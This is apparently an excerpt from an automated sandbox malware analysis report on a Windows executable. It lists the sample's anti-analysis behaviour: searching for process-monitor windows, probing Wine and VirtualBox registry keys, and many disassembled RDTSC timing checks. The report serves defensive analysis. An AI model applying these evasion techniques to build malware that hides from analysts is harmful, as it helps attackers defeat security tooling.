Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E1EC32 second address: E1EC45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E1EC45 second address: E1EC7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F166h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007F4BA0D3F156h 0x00000015 jl 00007F4BA0D3F156h 0x0000001b jnl 00007F4BA0D3F156h 0x00000021 popad 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E0A7EC second address: E0A7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E0A7F7 second address: E0A7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E1DD01 second address: E1DD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E1DD07 second address: E1DD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E1DD0B second address: E1DD0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E21984 second address: E2198F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4BA0D3F156h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E21A96 second address: E21AA0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E21AA0 second address: E21AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 6CC0A04Eh 0x0000000d xor dx, E4B5h 0x00000012 lea ebx, dword ptr [ebp+1244D8BCh] 0x00000018 mov dword ptr [ebp+122D1F3Dh], ebx 0x0000001e xchg eax, ebx 0x0000001f jmp 00007F4BA0D3F166h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4BA0D3F15Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E21BFC second address: E21C0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E21C0D second address: E21C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E21C11 second address: E21C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E21C17 second address: E21C35 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4BA0D3F15Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jo 00007F4BA0D3F156h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E21D76 second address: E21E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 jnc 00007F4BA0D3970Ch 0x0000000c mov dword ptr [ebp+122D1D21h], ebx 0x00000012 push 00000003h 0x00000014 mov cx, C149h 0x00000018 mov dword ptr [ebp+122D280Dh], esi 0x0000001e push 00000000h 0x00000020 js 00007F4BA0D39709h 0x00000026 sub dl, FFFFFFFAh 0x00000029 push 00000003h 0x0000002b mov dword ptr [ebp+122D27FCh], eax 0x00000031 push 8051659Fh 0x00000036 jmp 00007F4BA0D3970Bh 0x0000003b add dword ptr [esp], 3FAE9A61h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F4BA0D39708h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c mov dl, 24h 0x0000005e ja 00007F4BA0D3970Ah 0x00000064 call 00007F4BA0D39714h 0x00000069 and edx, dword ptr [ebp+122D2C57h] 0x0000006f pop edi 0x00000070 lea ebx, dword ptr [ebp+1244D8D0h] 0x00000076 jns 00007F4BA0D3970Ch 0x0000007c xchg eax, ebx 0x0000007d push edx 0x0000007e jmp 00007F4BA0D39717h 0x00000083 pop edx 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 jne 00007F4BA0D39716h 0x0000008d jmp 00007F4BA0D39710h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E21E4B second address: E21E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4BA0D3F156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E17F96 second address: E17FB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39717h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E17FB4 second address: E17FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4BA0D3F156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E17FC0 second address: E17FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F4BA0D3970Ch 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E17FD7 second address: E17FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E3FBAA second address: E3FBC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E3FFEF second address: E3FFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E3FFF3 second address: E3FFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E406BB second address: E406C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E406C1 second address: E406E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4BA0D39706h 0x0000000a jnl 00007F4BA0D39706h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4BA0D3970Fh 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E406E5 second address: E4070D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a jno 00007F4BA0D3F167h 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E3576D second address: E35771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E35771 second address: E35775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E40A04 second address: E40A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39714h 0x00000007 pushad 0x00000008 jmp 00007F4BA0D39718h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E40A3E second address: E40A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E410F9 second address: E410FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E413E5 second address: E413EF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E413EF second address: E41413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007F4BA0D39714h 0x0000000d push esi 0x0000000e jl 00007F4BA0D39706h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E19BCE second address: E19BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4BA0D3F15Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E47B58 second address: E47B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E47F21 second address: E47F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4CEA8 second address: E4CEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4CEB0 second address: E4CEBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4CEBC second address: E4CEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E16412 second address: E16425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4BA0D3F15Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4C462 second address: E4C47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D39711h 0x00000009 jp 00007F4BA0D39706h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4C606 second address: E4C622 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4BA0D3F158h 0x00000008 jmp 00007F4BA0D3F15Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4C622 second address: E4C65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F4BA0D39716h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F4BA0D39706h 0x00000014 jmp 00007F4BA0D39713h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4C65A second address: E4C660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4CBB2 second address: E4CBE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4BA0D39719h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F4BA0D3970Ch 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4E6CA second address: E4E6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4EAA2 second address: E4EAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4EF9E second address: E4EFD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a mov edi, dword ptr [ebp+122D2AF7h] 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007F4BA0D3F168h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F4BA0D3F156h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4F1BF second address: E4F1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4F4BB second address: E4F502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F4BA0D3F158h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 pushad 0x00000024 js 00007F4BA0D3F157h 0x0000002a stc 0x0000002b adc ch, FFFFFFF5h 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F4BA0D3F15Eh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4F502 second address: E4F508 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4F508 second address: E4F50F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4F9FB second address: E4F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E4F9FF second address: E4FA17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E50444 second address: E5044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5044A second address: E5047C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4BA0D3F165h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E515B5 second address: E515B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E50C60 second address: E50C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E50C64 second address: E50C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E50C68 second address: E50C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E52C7B second address: E52C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E52C8B second address: E52C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E52D29 second address: E52D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E52D2D second address: E52D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E52D31 second address: E52D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E52D37 second address: E52D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E52D3D second address: E52D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E54E3E second address: E54EDA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3F158h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F4BA0D3F158h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jne 00007F4BA0D3F16Eh 0x0000002f mov dword ptr [ebp+122D2848h], edx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F4BA0D3F158h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push 00000000h 0x00000053 jmp 00007F4BA0D3F166h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c jmp 00007F4BA0D3F15Ch 0x00000061 pop eax 0x00000062 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E581C1 second address: E581F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 mov bx, 7DB9h 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+1246C301h] 0x00000015 push 00000000h 0x00000017 mov bl, CAh 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4BA0D39712h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E581F1 second address: E581F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E581F5 second address: E581FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E59051 second address: E59068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D3F162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E59F0A second address: E59F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E59F0E second address: E59F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E59F14 second address: E59F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D39711h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5AEBE second address: E5AEDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jc 00007F4BA0D3F156h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5AEDE second address: E5AEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5833C second address: E58342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5A090 second address: E5A09A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4BA0D39706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5B13E second address: E5B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5913B second address: E59142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5D0BF second address: E5D0DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D3F166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5DF22 second address: E5DF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4BA0D39706h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007F4BA0D3971Fh 0x00000012 pushad 0x00000013 jmp 00007F4BA0D39711h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
